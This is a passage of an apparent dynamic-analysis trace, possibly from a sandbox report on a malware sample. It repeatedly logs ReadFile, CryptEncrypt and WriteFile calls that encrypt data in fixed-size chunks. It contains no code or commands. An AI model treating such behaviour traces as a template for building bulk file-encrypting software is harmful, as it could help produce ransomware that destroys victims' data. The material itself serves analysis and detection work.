[0276.682] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.682] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.682] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.682] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.682] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.682] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.682] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.682] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.682] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.682] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.682] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.682] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.683] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.683] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.683] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.683] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.683] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.683] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.683] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.683] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.683] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.683] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.683] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.683] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.684] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.684] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.684] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.684] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.684] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.684] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.684] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.684] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.684] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.684] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.684] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.684] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.684] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.684] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.685] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.685] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.685] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.685] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.685] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.685] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.685] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.685] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.685] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.685] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.685] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.685] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.686] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.686] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.686] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.686] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.686] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.686] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.686] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.686] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.686] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.686] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.686] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.686] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.686] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.687] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.687] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.687] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.687] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.687] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.687] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.689] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.689] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.689] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.689] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.689] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.689] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.689] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.689] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.689] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.689] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.689] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.690] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.690] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.690] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.690] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.690] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.690] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.690] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.690] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.690] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.690] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.690] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.690] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.690] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.691] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.691] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.691] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.691] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.691] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.691] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.691] CryptEncrypt (in: hKey=0x2fb808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, 